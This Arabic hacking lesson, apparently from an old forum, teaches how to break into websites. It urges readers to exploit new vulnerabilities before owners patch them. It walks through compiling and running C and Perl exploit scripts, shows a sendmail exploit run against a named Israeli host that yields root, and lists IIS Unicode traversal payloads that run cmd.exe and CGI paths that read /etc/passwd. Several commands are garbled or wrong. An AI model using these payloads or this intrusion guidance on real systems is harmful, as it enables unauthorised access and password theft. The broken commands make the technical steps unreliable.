س.ماهي الثغرات ومامعناها 

الثغرات هي ضعف امني يساعد في دخول النظام معين واختراقه وقد تكون أيضا الطريقه المساعدة التي تخليك تتحول من user الي administrator يعني من مستخدم الي المدير المتصرف وتتضمن ويجب علي الدوام معرفه الثغرات الامنيه الجديدة واستثمارها علشان لا ينتبه أصحاب المواقع بها يرقعوها يتم تقفيلها واقرب مثال لهذه الثغرات الضعف الأمني الذي اكتشف في الاباتشي وهو سيرفر يركب علي نظام ليونكس واي ضعف في احد البرامج او قاعدة بناء الموقع تعتبر ثغرة ومن الممكن استخدمها والاستفاده منها في اختراق الموقع المراد اختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ماتريد عن طريقها 

كيف استثمر الثغره اذا لقيتها 

من وقت ما اكتشفوا الثغرات كانت نسبه 99% من الثغرات تكون سكربتا تها مكتوبه بالغه c وتحتاج لمعرفة اللغه او عليك تحويلها 

كما ان هناك العديد من الثغرات تحتاج الي shell حتي تتمكن من الاستفاده من هذه الثغره او بمعني اخر الضعف وعلي سبيل المثال بعض الثغرات الموجوده في PHP تحتاج الي shell PHP 

الضعف يكون في الاصدارت الخاصه 

فيع ثغره من نوع Kernel 2.2.x ولكن هذه المره في نظام تشغيل ليونكس 

ملاحظه 

هذه الثغرات تكون بالغه c تكون سيكربتات توجد في الموقع 

وهناك أيضا سيكربتات اخري مكتوبه بالغه perl لازم تكون في هذه الحاله مركب لوينكس علشان الأوامر وانصح تركيب Linux Redhat 7.3

لانه افضل من الماند ريك والماندريك صوره مبسطه للريدهات غير قابل للتطور وان الريد هات اقوي 

طريقه تحويل لغه البيرل 

الطريقه سهله كلها أوامر في البدايه تكتب هذا الامر 

./ lp.file 

يعطيك هذه الرساله 

Access Denied هذه الرساله توضح عدم الموافقه اذا صار لك كذا تكتب الامر 

chmod + x conik.pl لاحظ مكان كونيك

 تكتب اسم الملف 

وشغله مره ثانيه وشوف النتيجه راح تكون زي كذا $./conik.pl

ولغه c

تحويل الملف لازم انت تخلي الملف يكون ملف تنفيذي بالامر التالي 

gcc-o conik conik.c 

وراح يكون الملف جاهز بعد هذا الامر 

./conik.c 

وبعد ماصار الملف جاهز 

gcc -o sendmail.c$ 

./sendemmail $

usage:sendmail <host> <os > user password 

$./ sendmail smtp.israel.com RedHat-7.3 anonymous anonymous-----

تكتب الموقع اللي تبغاه مكان Israel

connecting to host connected...

id

uid=0 root gid=0 root 

لاحظ انه طلب منا الملقم للبرنامج sendemail وطلب نظام التشغيل واليوز والباسورد واعطنا البرنامج امتياز root بسب قيام البرنامج بتنفيذ Exan nofer 

لاتظن ان لما حطيت البرنامج xxx.sendmail بدون أي سبب انا حطيت للك هذا المثال لانه هناك ثغره في هذ البرنامج وراح اشرحها ان شاء الله ابيك تحفظ الاسم 

ماهي conik هذا الطريقه يبي لها نظام تشغيل ولغه c و perl ؟

ثغرة تستخدم من خلال المتصفح يعني انت تشوف معلومات الموقع عبر المتصفح وتوصل الي ملف الباسوردات من هذه الطريقه ومثال علي هذه الثغرات PHP-CGI-UNICODE-VB-ETC 

UNICODE هي عباره عن ضعف في نظام IIS في Microsoft تساعد في اختراق الموقع بكل سهوله هذي طريقة الاختراق بهاذي الطريقه 

امثله علي ثغرت UNICODE 

/-vti -bin/..%25%35%63..0%25%35%36..25%35%36%..25%35%36..%25% 35%36%../winnt/system32/cmd.exe? c+dir+c:/ 

اما ثغرات CGI مثال 

cgi-bin/view-source?../../../../../../../etc/passwd

cgi-bin/phf

cgi-bin/wwwboard.pl

cgi-bin/AT-admin.cgi 

هذا ما استطعت تقديمه من درس اختراق الهاك لاختراق المواقع 

لتنزيل لينكس اضغط هنا